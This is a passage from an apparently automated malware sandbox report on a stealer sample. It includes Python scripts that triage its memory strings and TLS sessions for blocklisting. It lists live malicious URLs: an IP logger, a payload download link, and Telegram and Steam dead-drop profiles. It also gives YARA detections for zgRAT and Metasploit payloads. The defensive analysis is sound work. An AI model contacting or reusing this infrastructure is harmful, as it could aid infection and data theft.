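    "Source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.msa/msal-net-3x-cache-breaking-change",
    "Source: RegAsm.exe, 00000002.00000002.1950398912.00000000010AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=json",
    "Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org/?format=jsonZC",
    "Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001106000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api64.ipify.org:443/?format=json",
    "Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/download",
    "Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://file-link-iota.vercel.app/downloadC:",
    "Source: gobEmOm5sr.exe, 00000000.00000002.1654904203.0000000004EF5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.1947694025.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::",
    "Source: RegAsm.exe, 00000002.00000002.1950398912.0000000001188000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org/1nhuM4.js",
    "Source: RegAsm.exe, 00000002.00000002.1954978502.0000000004961000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://iplogger.org:443/1nhuM4.jsoft",
    "Source: 7wpHB_IZvVwIDf0EgO_TfPH6.exe, 0000000B.00000002.2146809633.00000000032B5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/fneogrnfeowkhttps://t.me/edm0di11ihttps://steamcommunity.com/profiles/76561199768374681",
    "Source: RegAsm.exe, 00000002.00000002.1953387241.0000000003CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtransfer.net/handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5f",
]

LINE_RE = re.compile(r"^Source: (.+?) String found in binary or memory: (.+)$")
PROC_RE = re.compile(r"([\w.-]+\.exe), [0-9A-F]{8}\.")      # process name in front of each dump id
URL_RE = re.compile(r"https?://(?:(?!https?://)\S)+")         # splits URLs that were read back to back
STRIP = ")&=:$"                                               # bytes of the next string glued onto a URL

# Triage buckets by host suffix. This grouping is mine, not part of the report.
CATEGORIES = {
    "sdk-reference": ("aka.ms", "login.microsoftonline.com", "newtonsoft.com", "nuget.org",
                      "github.com", "datamarket.azure.com", "datamarket.accesscontrol.windows.net"),
    "victim-geolocation": ("ip.sb", "ipify.org", "ipinfo.io", "ipgeolocation.io"),
    # Telegram channels and Steam profiles are commonly used as dead-drop resolvers by Vidar-family stealers.
    "dead-drop-resolver": ("t.me", "steamcommunity.com"),
    "delivery-or-tracking": ("iplogger.org", "vercel.app", "youtransfer.net"),
}

def normalize(url):
    """Drop glued-on trailing punctuation and an explicit default port."""
    url = url.rstrip(STRIP)
    url = re.sub(r"^(https://[^/:]+):443(?=/|$)", r"\1", url)
    return re.sub(r"^(http://[^/:]+):80(?=/|$)", r"\1", url)

def host_of(url):
    return re.match(r"https?://([^/:?]+)", url).group(1).lower()

def categorize(url):
    host = host_of(url)
    for cat, suffixes in CATEGORIES.items():
        if any(host == s or host.endswith("." + s) for s in suffixes):
            return cat
    return "unclassified"          # e.g. the corrupted host "aka.msa" lands here for manual review

def canonical_map(urls, max_tail=3):
    """Map each URL to a shorter URL it merely extends by <= max_tail characters (memory over-read)."""
    canon = {}
    for u in sorted(urls, key=len):
        bases = {c for c in canon.values() if u != c and u.startswith(c) and len(u) - len(c) <= max_tail}
        canon[u] = max(bases, key=len) if bases else u
    return canon

def triage(lines):
    """Return {category: [(url, [processes that held it]), ...]} with variants merged."""
    procs_by_url = defaultdict(set)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        procs = set(PROC_RE.findall(m.group(1)))
        for raw in URL_RE.findall(m.group(2)):
            procs_by_url[normalize(raw)] |= procs
    canon = canonical_map(procs_by_url)
    merged = defaultdict(set)
    for url, procs in procs_by_url.items():
        merged[canon[url]] |= procs
    report = defaultdict(list)
    for url in sorted(merged):
        report[categorize(url)].append((url, sorted(merged[url])))
    return dict(report)

if __name__ == "__main__":
    for cat, entries in triage(REPORT_LINES).items():
        print(f"[{cat}]")
        for url, procs in entries:
            print(f"  {url}  <- {', '.join(procs)}")
```

Feeding the whole section in produces one line per distinct URL instead of the fifty-odd raw hits, and the `dead-drop-resolver` and `delivery-or-tracking` buckets are the ones worth turning into blocklist entries; the `sdk-reference` bucket is library noise and should never be alerted on. The `max_tail` merge is deliberately conservative so that genuinely different paths such as `/` and `/download` stay separate.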
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown HTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 76.76.21.142:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 158.69.225.124:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49780 version: TLS 1.2
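The port lines and the HTTPS lines above describe the same thirteen TLS 1.2 sessions from two angles: each client port appears once per direction in the port lines and once, with the remote address, in the HTTPS lines. Several remote addresses sit in CDN or messenger ranges, so blocking them by IP would hit unrelated services while leaving the actual hosts reachable. The following Python, added here as an example and not part of the report, joins the two line types into one session table, confirms that traffic flowed in both directions, attributes each remote IP to a provider, and counts sessions per address. The provider prefixes are taken from the providers' published lists and are an assumption that should be re-checked against the current lists; the sample lines are copied from the section above and cover five of the thirteen sessions.

```python
import ipaddress
import re
from collections import Counter, defaultdict

# Lines copied from the network section of the report (subset: five of the thirteen sessions).
NETWORK_LINES = [
    "Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766",
    "Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764",
    "Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443",
    "Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 443",
    "Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443",
    "Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777",
    "Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731",
    "Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752",
    "Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443",
    "Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443",
    "Source: unknown HTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.4:49731 version: TLS 1.2",
    "Source: unknown HTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.4:49752 version: TLS 1.2",
    "Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49764 version: TLS 1.2",
    "Source: unknown HTTPS traffic detected: 104.21.10.172:443 -> 192.168.2.4:49766 version: TLS 1.2",
    "Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49777 version: TLS 1.2",
]

# Provider prefixes from the providers' published range lists (assumption: verify against current lists).
PROVIDER_RANGES = {
    "cloudflare": ["104.16.0.0/13", "104.24.0.0/14", "188.114.96.0/20"],
    "telegram": ["149.154.160.0/20"],
}

TLS_RE = re.compile(r"HTTPS traffic detected: (\S+):(\d+) -> (\S+):(\d+) version: (TLS [\d.]+)")
PORT_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")

def provider_of(ip):
    addr = ipaddress.ip_address(ip)
    for name, ranges in PROVIDER_RANGES.items():
        if any(addr in ipaddress.ip_network(r) for r in ranges):
            return name
    return "unattributed"

def tls_sessions(lines):
    """Return {client_port: session} joining the HTTPS lines with the per-direction port lines."""
    sessions, directions = {}, defaultdict(set)
    for line in lines:
        if (m := TLS_RE.search(line)):
            remote, rport, _client, cport, version = m.groups()
            sessions[int(cport)] = {"remote": remote, "remote_port": int(rport), "version": version,
                                     "provider": provider_of(remote), "bidirectional": False}
        elif (m := PORT_RE.search(line)):
            src, dst = int(m.group(1)), int(m.group(2))
            # "443 -> N" is data from the server to client port N, "N -> 443" is data from the client.
            directions[dst if src == 443 else src].add("in" if src == 443 else "out")
    for cport, session in sessions.items():
        session["bidirectional"] = directions[cport] == {"in", "out"}
    return sessions

def egress_summary(sessions):
    """Sessions per remote IP with provider tag; CDN-fronted addresses are poor block candidates."""
    per_ip = Counter(s["remote"] for s in sessions.values())
    return {ip: (count, provider_of(ip)) for ip, count in per_ip.items()}

if __name__ == "__main__":
    sessions = tls_sessions(NETWORK_LINES)
    for ip, (count, provider) in sorted(egress_summary(sessions).items(), key=lambda kv: -kv[1][0]):
        print(f"{ip:16} sessions={count} provider={provider}")
```

On the full section, 104.21.10.172 accounts for six of the thirteen sessions and, like 104.26.2.46 and 188.114.96.3, sits behind Cloudflare, so the hostnames from the string section are the durable indicator there; 149.154.167.99 is Telegram, consistent with the t.me URLs held by 7wpHB_IZvVwIDf0EgO_TfPH6.exe. The unattributed addresses are the ones where an IP-level block is meaningful.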
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp783F.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp785F.tmp Jump to dropped file

System Summary

Source: 25.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 15.2.1YtOZF0EeqgcR_ddwAXkTcuY.exe.3cc5570.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000000A.00000002.2204897517.000000000196E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000010.00000002.2284303938.00000000027E4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000A.00000002.2204897517.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000010.00000002.2284303938.0000000002B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 7_2_00409448
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Code function: 0_2_05DF0040 0_2_05DF0040
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Code function: 0_2_05DFA08C 0_2_05DFA08C
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Code function: 0_2_05DF0007 0_2_05DF0007
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Code function: 0_2_05DF6E80 0_2_05DF6E80
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Code function: 0_2_05DF6E73 0_2_05DF6E73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004CF160 2_2_004CF160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00481170 2_2_00481170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042C1F0 2_2_0042C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0046D250 2_2_0046D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00436230 2_2_00436230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004302C0 2_2_004302C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00431360 2_2_00431360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00451300 2_2_00451300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004213A0 2_2_004213A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004424E0 2_2_004424E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00508650 2_2_00508650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00437680 2_2_00437680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00434690 2_2_00434690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00433760 2_2_00433760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0047E8A0 2_2_0047E8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004348B0 2_2_004348B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00440A90 2_2_00440A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00426D90 2_2_00426D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0054D02A 2_2_0054D02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004210E0 2_2_004210E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00543169 2_2_00543169
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00402100 2_2_00402100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042D100 2_2_0042D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042A1E0 2_2_0042A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00516190 2_2_00516190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005121A0 2_2_005121A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004432C0 2_2_004432C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005612E0 2_2_005612E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_004242B0 2_2_004242B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00423470 2_2_00423470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0040B5E0 2_2_0040B5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00405640 2_2_00405640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00422640 2_2_00422640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00402630 2_2_00402630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0044A710 2_2_0044A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005427C0 2_2_005427C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0054F7F8 2_2_0054F7F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_005667ED 2_2_005667ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00421820 2_2_00421820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00425820 2_2_00425820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00551830 2_2_00551830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042C8E0 2_2_0042C8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0042D8B0 2_2_0042D8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0041E9E0 2_2_0041E9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00561EFC 2_2_00561EFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00401E90 2_2_00401E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00440FF0 2_2_00440FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00515F95 2_2_00515F95
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_02BFA3D8 6_2_02BFA3D8
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_02BFA3CA 6_2_02BFA3CA
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_02BFA180 6_2_02BFA180
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_02BFA174 6_2_02BFA174
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053594C0 6_2_053594C0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535E710 6_2_0535E710
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053556D0 6_2_053556D0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053581C0 6_2_053581C0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053515A8 6_2_053515A8
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053594B0 6_2_053594B0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535E700 6_2_0535E700
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535A630 6_2_0535A630
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535A640 6_2_0535A640
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053556CA 6_2_053556CA
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053581B0 6_2_053581B0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535B9B0 6_2_0535B9B0
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_0535B9A2 6_2_0535B9A2
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_053689C8 6_2_053689C8
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_05686B88 6_2_05686B88
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_056809C8 6_2_056809C8
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_056809B7 6_2_056809B7
Source: C:\Users\user\Documents\iofolko5\REaoHTwA9AqN_cDvubi9mxZt.exe Code function: 6_2_05683BD4 6_2_05683BD4
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_0040840C 7_2_0040840C
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Code function: 8_2_01372DD0 8_2_01372DD0
Source: C:\Users\user\Documents\iofolko5\yh8OwfLgsaGOEy8sLU5UpJIK.exe Code function: 8_2_01372C60 8_2_01372C60
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Code function: 9_2_017D6398 9_2_017D6398
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Code function: 9_2_017D638B 9_2_017D638B
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Code function: 9_2_017D65FA 9_2_017D65FA
Source: C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.exe Code function: 9_2_017D6608 9_2_017D6608
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EAD2AC 17_2_61EAD2AC
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E4B8A1 17_2_61E4B8A1
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E75F1F 17_2_61E75F1F
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E40065 17_2_61E40065
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9E24F 17_2_61E9E24F
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E62554 17_2_61E62554
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9A4A7 17_2_61E9A4A7
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E4E4BF 17_2_61E4E4BF
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E94783 17_2_61E94783
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E7A790 17_2_61E7A790
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E18736 17_2_61E18736
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E86668 17_2_61E86668
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E58670 17_2_61E58670
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E6667F 17_2_61E6667F
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EA0BA9 17_2_61EA0BA9
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E62CA3 17_2_61E62CA3
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E98FE2 17_2_61E98FE2
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E88FCA 17_2_61E88FCA
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E52F80 17_2_61E52F80
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EA2F47 17_2_61EA2F47
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E56F18 17_2_61E56F18
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E4CEF9 17_2_61E4CEF9
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E1EEFF 17_2_61E1EEFF
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EA91F6 17_2_61EA91F6
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E651DD 17_2_61E651DD
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9316A 17_2_61E9316A
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9F0ED 17_2_61E9F0ED
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EA70CF 17_2_61EA70CF
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9D0C3 17_2_61E9D0C3
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E8D0B6 17_2_61E8D0B6
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E6904E 17_2_61E6904E
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E4304E 17_2_61E4304E
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E15337 17_2_61E15337
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E672DC 17_2_61E672DC
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E19208 17_2_61E19208
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E534E3 17_2_61E534E3
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E77452 17_2_61E77452
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E37930 17_2_61E37930
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E21816 17_2_61E21816
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61E9FBF0 17_2_61E9FBF0
